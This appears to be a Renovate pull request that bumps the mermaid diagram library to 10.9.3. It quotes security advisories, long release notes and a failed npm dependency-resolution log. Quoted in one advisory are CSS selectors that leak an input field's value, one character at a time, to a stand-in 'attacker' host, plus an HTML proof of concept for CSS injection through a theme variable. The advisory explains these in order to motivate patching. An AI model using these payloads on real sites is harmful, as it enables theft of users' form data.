fix(deps): update dependency mermaid to v10 [security]

[renovate]

Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more here.

This PR contains the following updates:

Package	Change	Age	Confidence
mermaid	8.5.0 -> 10.9.3

GitHub Vulnerability Alerts

CVE-2021-35513

Mermaid before 8.11.0 allows XSS when the antiscript feature is used.

CVE-2021-43861

Impact

Malicious diagrams can contain javascript code that can be run at diagram readers machines.

Patches

The users should upgrade to version 8.13.8

Workarounds

You need to upgrade in order to avoid this issue.

CVE-2022-31108

An attacker is able to inject arbitrary CSS into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS selectors.

The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value attribute one character at a time. Whenever there is an actual match, an http request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character.

input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

• Open an issue in example link to repo
• Email us at example email address

Product

mermaid.js

Tested Version

v9.1.1

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

By supplying a carefully crafted textColor theme variable, an attacker can inject arbitrary CSS rules into the document. In the following snippet we can see that getStyles does not sanitize any of the theme variables leaving the door open for CSS injection.

Snippet from src/styles.js:

const getStyles = (type, userStyles, options) => {
  return ` {
    font-family: ${options.fontFamily};
    font-size: ${options.fontSize};
    fill: ${options.textColor}
  }

For example, if we set textColor to "green;} #target { background-color: crimson }" the resulting CSS will contain a new selector #target that will apply a crimson background color to an arbitrary element.

<html>

<body>
    <div id="target">
        <h1>This element does not belong to the SVG but we can style it</h1>
    </div>
    <svg id="diagram">
    </svg>

    <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
    <script>
        mermaid.initialize({ startOnLoad: false });

        const graph =
            `
            %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
            graph TD
                A[Goose]
            `

        const diagram = document.getElementById("diagram")
        const svg = mermaid.render('diagram-svg', graph)
        diagram.innerHTML = svg
    </script>
</body>

</html>

In the proof of concept above we used the textColor variable to inject CSS, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:

• https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393
• https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35

Impact

This issue may lead to Information Disclosure via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.

Remediation

Ensure that user input is adequately escaped before embedding it in CSS blocks.

GHSA-m4gq-x24j-jpmf

The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.

This affects the built:

• dist/mermaid.min.js
• dist/mermaid.js
• dist/mermaid.esm.mjs
• dist/mermaid.esm.min.mjs

This will also affect users that use the above files via a CDN link, e.g. https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js

Users that use the default NPM export of mermaid, e.g. import mermaid from 'mermaid', or the dist/mermaid.core.mjs file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like npm audit fix.

Patches

• develop branch: 6c785c93166c151d27d328ddf68a13d9d65adc00
• backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34

---

Release Notes

mermaid-js/mermaid (mermaid)

v10.9.3

Compare Source

Updates the bundled version of dependencies in the following files:

• dist/mermaid.min.js
• dist/mermaid.js
• dist/mermaid.esm.mjs
• dist/mermaid.esm.min.mjs

If you are not using these files (e.g. you are using the default NPM export of mermaid, e.g. import mermaid from 'mermaid', or you are using dist/mermaid.core.mjs), this release is identical to v10.9.2.

This is to avoid potential security issues in KaTeX and DOMPurify, see:

• GHSA-mmhx-hmjr-r674
• GHSA-64fm-8hw2-v72w
• GHSA-cvr6-37gx-v8wc
• GHSA-f98w-7cxr-ff2h
• GHSA-3wc5-fcw2-2329

These dependencies have already been updated in v11.0.0.

Changelog

Chore

• Updates the bundled version of KaTeX to 0.16.11 (2bedd0e)
• Updates the bundled version of DOMPurify to 3.1.6 (92a07ff)

Full Changelog: mermaid-js/mermaid@v10.9.2...v10.9.3

v10.9.2

Compare Source

This release back-ports #​5914 to the v10 release line to fix #​5904 (an incompatibility between mermaid and DOMPurify v3.1.7)

Patch Changes

• #​5914 402abdf [10] fix: ban version v3.1.7 of DOMPurify

Full Changelog: mermaid-js/mermaid@v10.9.1...v10.9.2

v10.9.1

Compare Source

What's Changed

BugFixes

• Cleaning of labels in Block diagram by @​knsv

Docs

• docs(integrations): update link to Mermaid app for Slack by @​JackuB in #​5370
• Update new diagram doc to reflect focus on Langium by @​sidharthv96 in #​5372
• feat: Make the examples interactive in the documentation site by @​sidharthv96 in #​5376
• DOCS: add latest blog posts by @​huynhicode in #​5368
• DOCS: update Announcement bar link by @​huynhicode in #​5394
• DOCS: Add Press Release by @​huynhicode in #​5400
• DOCS: add Turing machine blog post by @​huynhicode in #​5425
• DOCS: update latest news by @​huynhicode in #​5455
• 📝🐛 fix schema link by @​dudeofawesome in #​5456
• DOCS: Add AI in Software Diagramming blog post by @​huynhicode in #​5492
• DOCS: update Mermaid Chart page by @​huynhicode in #​5495
• DOCS: Add blog post - Documentation Software by @​huynhicode in #​5519

New Contributors

• @​dudeofawesome made their first contribution in #​5456

Full Changelog: mermaid-js/mermaid@v10.9.0...v10.9.1

v10.9.0

Compare Source

Release Notes

We now have Katex support!

Demo

🚀 Features

• Bump @​zenuml/core and update render options in mermaid-zenuml (#​5257) @​dontry
• Implement "until" keyword in gantt charts (#​5224) @​fzag
• Integrated Katex typesetting into flowcharts (#​2885) @​NicolasNewman

🧰 Maintenance

• Add gitgraph parallel commits to docs (#​5336) @​NicolasCwy
• Update recommended Vitest extension (#​5322) @​NicolasCwy
• Correcting path to docker-entrypoint.sh (#​5327) @​bstordrup
• Fix chrome webstore url causing 404 (#​5352) @​Abrifq
• Fix color and arrow for merge commit (gitGraph) (#​5152) @​macherel
• Fix link to Contributors section in README (#​5298) @​BaumiCoder
• Fix macOS onboarding issues (#​5262) @​thedustin
• Fix netlify deploy (#​5332) @​sidharthv96
• Link to webhelp (#​5316) @​BaumiCoder
• Update contribute (#​5268) @​FutzMonitor
• Updates Timeline Documentation (#​5315) @​FutzMonitor
• [Docs] Updated chrome extension url's to new store (#​5297) @​Abrifq
• chore: Update CSpell configuration (#​5286) @​Jason3S
• feat: add name field to the actors (#​5284) @​ad1992
• fix typo cutomers => customers (#​5269) @​elgalu

📚 Documentation

• Add new extension to integrations (#​5287) @​BoDonkey
• Added link to Blazorade Mermaid to the community integrations page. (#​5333) @​MikaBerglund
• Replace version number placeholder (#​5304) @​BaumiCoder

🎉 Thanks to all contributors helping with this release! 🎉

v10.8.0

Compare Source

v10.8.0

Features

• Adding new diagram type - Block Diagram by @​knsv in #​5221

• Feature/5114 add parallel commit config by @​mathbraga in #​5161

• Changes to Gantt Parsers to allow hashes and semicolons to titles, sections, and task data. by @​FutzMonitor in #​5095

• Feature/4653 add actor-top class to sequence diagram by @​Ronid1 in #​5241

Documentation

• Updated gantt chart docs to show all config options by @​murdoa in #​5192
• Contribution documentation improvements by @​nirname in #​5132
• Update flowchart.md - how to use font-awesome #​5195 by @​arukiidou in #​5196
• Add more detailed docs for Gantt tasks by @​sorenisanerd in #​5194
• Docs/4974 reorder integration links by @​Ronid1 in #​5066
• docs: fix swimm link by @​Yokozuna59 in #​5219
• Update Slack community links to Discord by @​Olegt0rr in #​5225
• Docs: Mermaid chart updates by @​huynhicode in #​5232
• Fix typos in timeline syntax samples by @​sblom in #​5139

Bug fixes

• Bug/5059 fix external connection after updating edges by @​mathbraga in #​5127
• [Fix] Sequence diagram actor menu popup by @​vitorsss in #​5160
• fix: Dompurify Hooks by @​sidharthv96 in #​5236
• Accurate pie chart labeling for text alignment by @​JenningsWilliam in #​5141
• fix: Redirect of old URLs by @​sidharthv96 in #​5250
• Fixed Typo in ErrorRenderer.ts by @​FutzMonitor in #​5256

Chores

• Revert "Revert 5041 feature/4935 subgraph title margin config option" by @​mathbraga in #​5205
• build(deps-dev): bump follow-redirects from 1.15.2 to 1.15.5 by @​dependabot in #​5200
• chore(deps): update all patch dependencies (patch) by @​renovate in #​5150
• E2E Image comparison by @​sidharthv96 in #​5208
• E2E test by @​sidharthv96 in #​5210
• Optimise caching of test results by @​sidharthv96 in #​5213
• Update update-browserlist.yml to fix deprecation and action fails by @​Abrifq in #​5151
• UpdateCypress by @​sidharthv96 in #​5228
• Use node v20 by @​sidharthv96 in #​5248
• Convert Mindmap to TS by @​sidharthv96 in #​5247
• chore: Add interface naming Convention by @​sidharthv96 in #​5254

New Contributors

• @​murdoa made their first contribution in #​5192
• @​arukiidou made their first contribution in #​5196
• @​sorenisanerd made their first contribution in #​5194
• @​Ronid1 made their first contribution in #​5066
• @​Olegt0rr made their first contribution in #​5225
• @​vitorsss made their first contribution in #​5160
• @​sblom made their first contribution in #​5139
• @​JenningsWilliam made their first contribution in #​5141

Full Changelog: mermaid-js/mermaid@v10.7.0...v10.8.0

v10.7.0

Compare Source

Release Notes

• 3952 lexical ids (#​5028) @​jgreywolf
• Add new Atlassian integrations (#​5021) @​nashtechlabs
• Adds Unison programming language to community integrations list (#​5180) @​rlmark
• Bump GitHub workflow actions to latest versions (#​5026) @​deining
• Changes to .prettierignore (#​5109) @​FutzMonitor
• Chore: Typo fixed in multiple files (#​4947) @​SusheelThapa
• DOCS: update Flowchart page (#​5169) @​huynhicode
• DOCS: update announcement bar (#​5193) @​huynhicode
• Docs: Ecosystem section pages - verbiage updates (#​5124) @​huynhicode
• Docs: Update latest news (#​5147) @​huynhicode
• Docs: add Mermaid for Slack integration (#​4824) @​JackuB
• Docs: add latest blog post - JetBrains extension (#​5158) @​huynhicode
• Docs: update Latest News section (#​5048) @​huynhicode
• Documentation: clarify sentence (#​5025) @​deining
• Fix issue with generic class not rendering (#​5098) @​jgreywolf
• Holiday 2023 promo (#​5080) @​huynhicode
• Referenced the PmWiki's Cookbook recipe enabling MermaidJs schematics… (#​5085) @​d-faure
• Release/10.7.0 (#​5188) @​sidharthv96
• Update NiceGuy.io links in integrations-community.md (#​5120) @​Abrifq
• Update all minor dependencies (minor) (#​5047) @​renovate
• Update all patch dependencies (patch) (#​5046) @​renovate
• Update all patch dependencies (patch) (#​5033) @​renovate
• Update generics docs (#​5130) @​jgreywolf
• Update index.md (#​5012) @​StefonSimmons
• Update integrations-community.md (Add Codemia to the list of productivity tools using Mermaid) (#​5189) @​markqian
• Updated README with expandable table of content. (#​4961) @​claesgill
• add links to make it easier (#​4952) @​ajdamico
• bug: #​4905 change shiki theme to github-light (#​4924) @​raiman264
• build(deps-dev): bump vite from 4.4.9 to 4.4.12 (#​5115) @​dependabot
• chore(deps): update all minor dependencies (minor) (#​5172) @​renovate
• chore(deps): update all minor dependencies (minor) (#​5131) @​renovate
• chore(deps): update all minor dependencies (minor) (#​5099) @​renovate
• chore(deps): update all minor dependencies (minor) (#​5071) @​renovate
• chore(deps): update all patch dependencies (patch) (#​5070) @​renovate
• chore(deps): update all patch dependencies (patch) (#​5015) @​renovate
• docs: Update classDiagram.md (#​4973) @​SahilNagpure07
• docs: fixed typo (#​4893) @​0xflotus
• feat(gantt): update styles (#​4930) @​Mister-Hope
• fix: #​5064 Handle case when line has only one point (#​5065) @​sidharthv96
• fix: getMessageAPI so it considers entity codes (#​5002) @​ad1992
• fix: render the participants in same order as they are created (#​5017) @​ad1992
• fix: target blank removed from anchor tag (#​4933) @​REVERB283
• prevent-inherited-lineheights-on-edgeterminal-4083 (#​4915) @​Patronud

🚀 Features

• Added functionality to support style keyword (#​5111) @​jgreywolf
• Feature/4935 subgraph title margin config option (#​5041) @​mathbraga
• Revert 5041 feature/4935 subgraph title margin config option (#​5197) @​sidharthv96
• feat #​5042: Add flowchart.maxEdges config. (#​5086) @​sidharthv96

🐛 Bug Fixes

• Bug/#​4497 Unable to Cherry Pick Merge Commit Solved (#​4944) @​RounakJoshi09
• Bug/4912 GitGraph routing and colouring for merges and cherry-picks (#​4927) @​guypursey
• Fix - static class attributes are not rendered underlined (#​5013) @​SteffenLm
• Revert "fix: render the participants in same order as they are created" (#​5198) @​sidharthv96
• bug/#​3251_linkStyle-can't-specify-ids Fixed (#​4934) @​RounakJoshi09
• fix(tooltip): remove redundant scroll offset (#​4958) @​csholmq
• fix/1294_exhaustive-clear-sequenceDb-variables (#​4941) @​rflban
• fix: #​5100 Add viewbox to sankey (#​5102) @​sidharthv96
• fix: Adjust piechart viewbox for mobile devices with small width (#​4288) @​iwestlin
• fix: clean comments in text in getDiagramFromText API so flowchart works well (#​5076) @​ad1992
• fix: flowchart image without text (#​5063) @​bonyuta0204

🧰 Maintenance

• Use release-drafter/release-drafter GitHub Action to label our PRs (#​4868) @​aloisklink
• build: use tsx instead of ts-node-esm (#​5104) @​aloisklink
• tests: update #registerExternalDiagrams testTimeout from 5 seconds to 20 seconds (#​5055) @​omer-priel

📚 Documentation

• Docs: update Getting Started page (#​5112) @​huynhicode
• Docs: update Latest News section (#​5107) @​huynhicode
• Docs: update latest news (#​4959) @​huynhicode
• Update XYChart's nav link in the docs template (#​5014) @​Abrifq
• feat: Track outbound links in docs site. (#​5116) @​sidharthv96

🎉 Thanks to all contributors helping with this release! 🎉

v10.6.1: 10.6.1

Compare Source

What's Changed

Bugfixes

• fix(flow): fix invalid ellipseText regex (#​5016) @​aloisklink
  • This was causing freezes in flowcharts that had a ( char in ellipse nodes

Documentation

• Docs: add Docusaurus to "Integrations - Community" page (#​4975) @​huynhicode
• Fix typo in build-docs.yml (#​4991) @​sadikkuzu
• Update README.md (#​4979) @​karthxk07
• docs: Add NotesHub to integrations-community page (#​4994) @​alex-titarenko

Chores

• chore(deps): update all minor dependencies (minor) (#​4997) @​renovate
• chore(deps): update all patch dependencies (patch) (#​4976) @​renovate

🎉 Thanks to all contributors helping with this release! 🎉

v10.6.0: 10.6.0

Compare Source

What's Changed

• Add new chart xychart by @​subhash-halder in #​4413

Fix

• bug/4849_center_axis_labels by @​dreathed in #​4860
• Better handling of large flowcharts and long edges @​knsv

Docs

• Add new Atlassian integrations by @​janjonas in #​4862
• docs: fix typo by @​dennis0324 in #​4887
• Update notes on orientation in GitGraph documentation by @​guypursey in #​4897
• Enhancment: twitter logo in doc by @​chaursiyasanjeet in #​4925
• Update link for the Mermaid integration in JetBrains IDEs by @​FirstTimeInForever in #​4883

Chores

• Wait for marker_unique_id.html E2E test to render before taking a screenshot by @​aloi
  sklink in #​4847
• Wait for theme-directives.html E2E test to render before taking a screenshot by @​aloisklink in #​4846
• chore(deps): update all patch dependencies (patch) by @​renovate in #​4851
• chore(dev-deps): update @typescript-eslint/* plugins to v6 (major) by @​aloisklink in #​4857
• chore: shorten flow-huge.spec.js test case using .repeat by @​Yokozuna59 in #​4859
• Publish Live Editor previews for the develop & next branches by @​sidharthv96 in #​4841
• chore(deps): update all minor dependencies (minor) by @​renovate in #​4870
• chore(deps): update all patch dependencies (patch) by @​renovate in #​4869
• Commented out broken test by @​nirname in #​4913
• chore(deps): update all patch dependencies (patch) by @​renovate in #​4891
• fix(class): avoid duplicate definition of fill by @​Mister-Hope in #​4929
• chore(deps): update all minor dependencies (minor) by @​renovate in #​4892
• making consitent config imports from diagramAPI by @​dreathed in #​4889
• fix(typos): Fix minor typos in the source code by @​mribeirodantas in #​4928
• chore(deps): update all patch dependencies (patch) by @​renovate in #​4945
• Bump @​babel/traverse from 7.22.10 to 7.23.2 by @​dependabot in #​4951
• Replace rehype-mermaidjs with rehype-mermaid by @​remcohaszing in #​4970

New Contributors

• @​dreathed made their first contribution in #​4860
• @​janjonas made their first contribution in #​4862
• @​dennis0324 made their first contribution in #​4887
• @​FirstTimeInForever made their first contribution in #​4883
• @​guypursey made their first contribution in #​4897
• @​chaursiyasanjeet made their first contribution in #​4925
• @​mribeirodantas made their first contribution in #​4928

Full Changelog: mermaid-js/mermaid@v10.5.1...v10.6.0

v10.5.1

Compare Source

What's Changed

• Fix: Fix for subgraphs when using flowchart-elk by @​knsv
• Docs: update Latest News section by @​huynhicode in #​4822
• Docs: update Ecosystem section by @​huynhicode in #​4817
• Docs: update Latest News section (Git Graph blog post) by @​huynhicode in #​4871
• Docs: Add Product Hunt info by @​huynhicode in #​4900
• Revert PH changes by @​sidharthv96 in #​4903

Full Changelog: mermaid-js/mermaid@v10.5.0...v10.5.1

v10.5.0: 10.5.0

Compare Source

What's Changed

Features

• feat(er): add entity name alias by @​tomperr in #​4758

Bugfixes

• Fix Twitter fontawesome class in flowchart.md by @​GingerNinjaNicko in #​4723
• fix(pie): align slices and legend orders by @​Yokozuna59 in #​4774
• Update class member handling by @​jgreywolf in #​4534
• fix(er): allow underscore as leading char by @​tomperr in #​4776
• Align arrows on sequence diagram by @​sidharthv96 in #​4804
• fix: Allow hollow markers on edges by @​sidharthv96 in #​4788
• fix: Fix for vulnerability making it possible to add javascript in class names by @​knsv

Documentation

• Docs/2910 Remove n00b and fix some docs by @​nirname in #​4767
• fix: typos by @​omahs in #​4801
• "CSS" instead of "css" in flowchart.md by @​jakeboone02 in #​4797
• fix(docs): Correct repeated text in flowchart.md by @​andriy-koz in #​4810
• Update link to Discourse theme component by @​gschlager in #​4811
• New Mermaid Live Editor for Confluence Cloud by @​zhifeiyue in #​4814
• Update classDiagram.md by @​jgreywolf in #​4781
• Support member definition to initialize class by @​sidharthv96 in #​4786
• fix: Add support for ~test Array~string~ back in Class by @​sidharthv96 in #​4805
• Added support for millisecond and second to gantt tickInterval by @​vertxxyz in #​4778
• Add directive support to all diagrams by preprocessing by @​sidharthv96 in #​4759
• Update README.md by @​jgreywolf in #​4780

Chores

• chore(deps): update all minor dependencies (minor) by @​renovate in #​4783
• chore(deps): update all patch dependencies (patch) by @​renovate in #​4782
• chore(deps): update all patch dependencies (patch) by @​renovate in #​4809
• chore: move commonDb into diagrams/common/commonDb by @​Yokozuna59 in #​4802
• Use utf8 encoding in Jupyter example by @​jonashaag in #​4701
• Update flowchart.md by @​Ogglas in #​4792
• Update flowchart.md by @​dsblank in #​4798
• Refactor cypress/helpers/util.ts by @​RohanHandore in #​4340
• refactor: Fix typings in utils.ts by @​sidharthv96 in #​4826
• Support ClassDefs in external diagrams by @​sidharthv96 in #​4819
• Fix: flowchartElk Arrow overlap by @​sidharthv96 in #​4830
• Give markers unique id's per graph by @​chadfawcett in #​4825

New Contributors

• @​GingerNinjaNicko made their first contribution in #​4723
• @​omahs made their first contribution in #​4801
• @​jakeboone02 made their first contribution in #​4797
• @​andriy-koz made their first contribution in #​4810
• @​gschlager made their first contribution in #​4811
• @​zhifeiyue made their first contribution in #​4814
• @​vertxxyz made their first contribution in #​4778
• @​jonashaag made their first contribution in #​4701
• @​Ogglas made their first contribution in #​4792
• @​dsblank made their first contribution in #​4798
• @​RohanHandore made their first contribution in #​4340
• @​chadfawcett made their first contribution in #​4825

Full Changelog: mermaid-js/mermaid@v10.4.0...v10.5.0

v10.4.0

Compare Source

Features

• feat: Support config in frontmatter. by @​sidharthv96 in #​4750
• feat(sankey): Show values by @​sidharthv96 in #​4748

Docs

• docs: Add development example page. by @​sidharthv96 in #​4714
• Documentation for #​2509 by @​jason-curtis in #​4740
• Fixes to Docs sidebar, main page and badges by @​nirname in #​4742
• Split development documentation into several pages by @​nirname in #​4744
• Docs: update Latest News section by @​huynhicode in #​4768

Chores

• Update all minor dependencies (minor) by @​renovate in #​4732
• Update all patch dependencies (patch) by @​renovate in #​4731
• convert assignWithDepth to TS by @​Yokozuna59 in #​4717
• convert diagrams/common/svgDrawCommon.js to ts by @​Yokozuna59 in #​4724
• ci(release-drafter): add more release notes categories by @​aloisklink in #​4752
• chore(deps): update all patch dependencies (patch) by @​renovate in #​4753
• standardized pie definitions by @​Yokozuna59 in #​4501
• Remove Circular Dependencies by @​sidharthv96 in #​4761
• chore: Enforce type imports by @​sidharthv96 in #​4763
• chore: Preview PRs with mermaid-live-editor on Netlify by @​sidharthv96 in #​4769

New Contributors

• @​jason-curtis made their first contribution in #​4740

Full Changelog: mermaid-js/mermaid@v10.3.1...v10.4.0

v10.3.1

Compare Source

What's Changed

Bugfixes

• fix style in contributors section of intro by @​keer4n in #​4670
• fix: #​4676 redirect fix by @​sidharthv96 in [#​4693](https://redirect.github.com/mermaid-js/m

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: web/package-lock.json

npm warn Unknown env config "store". This will stop working in the next major version of npm.
npm warn ERESOLVE overriding peer dependency
npm warn While resolving: @jimp/plugin-threshold@0.10.3
npm warn Found: @jimp/plugin-color@0.6.8
npm warn node_modules/@jimp/plugin-color
npm warn   @jimp/plugin-color@"^0.6.8" from @jimp/plugins@0.6.8
npm warn   node_modules/@jimp/plugins
npm warn     @jimp/plugins@"^0.6.8" from jimp@0.6.8
npm warn     node_modules/jimp
npm warn
npm warn Could not resolve dependency:
npm warn peer @jimp/plugin-color@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn node_modules/@jimp/plugin-threshold
npm warn   @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn   node_modules/potrace/node_modules/@jimp/plugins
npm warn
npm warn Conflicting peer dependency: @jimp/plugin-color@1.6.0
npm warn node_modules/@jimp/plugin-color
npm warn   peer @jimp/plugin-color@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn   node_modules/@jimp/plugin-threshold
npm warn     @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn     node_modules/potrace/node_modules/@jimp/plugins
npm warn ERESOLVE overriding peer dependency
npm warn While resolving: @jimp/plugin-threshold@0.10.3
npm warn Found: @jimp/plugin-resize@0.6.8
npm warn node_modules/@jimp/plugin-resize
npm warn   peer @jimp/plugin-resize@">=0.3.5" from @jimp/plugin-contain@0.6.8
npm warn   node_modules/@jimp/plugin-contain
npm warn     @jimp/plugin-contain@"^0.6.8" from @jimp/plugins@0.6.8
npm warn     node_modules/@jimp/plugins
npm warn   5 more (@jimp/plugin-cover, @jimp/plugin-rotate, ...)
npm warn
npm warn Could not resolve dependency:
npm warn peer @jimp/plugin-resize@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn node_modules/@jimp/plugin-threshold
npm warn   @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn   node_modules/potrace/node_modules/@jimp/plugins
npm warn
npm warn Conflicting peer dependency: @jimp/plugin-resize@1.6.0
npm warn node_modules/@jimp/plugin-resize
npm warn   peer @jimp/plugin-resize@">=0.8.0" from @jimp/plugin-threshold@0.10.3
npm warn   node_modules/@jimp/plugin-threshold
npm warn     @jimp/plugin-threshold@"^0.10.3" from @jimp/plugins@0.10.3
npm warn     node_modules/potrace/node_modules/@jimp/plugins
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: eslint-watch@7.0.0
npm error Found: eslint@8.2.0
npm error node_modules/eslint
npm error   dev eslint@"8.2.0" from the root project
npm error   peer eslint@">= 4.12.1" from babel-eslint@10.1.0
npm error   node_modules/babel-eslint
npm error     dev babel-eslint@"10.1.0" from the root project
npm error   10 more (eslint-config-airbnb, eslint-config-airbnb-base, ...)
npm error
npm error Could not resolve dependency:
npm error peer eslint@">=7 <8.0.0" from eslint-watch@7.0.0
npm error node_modules/eslint-watch
npm error   dev eslint-watch@"7.0.0" from the root project
npm error
npm error Conflicting peer dependency: eslint@7.32.0
npm error node_modules/eslint
npm error   peer eslint@">=7 <8.0.0" from eslint-watch@7.0.0
npm error   node_modules/eslint-watch
npm error     dev eslint-watch@"7.0.0" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /runner/cache/others/npm/_logs/2025-08-13T23_34_20_905Z-eresolve-report.txt
npm error A complete log of this run can be found in: /runner/cache/others/npm/_logs/2025-08-13T23_34_20_905Z-debug-0.log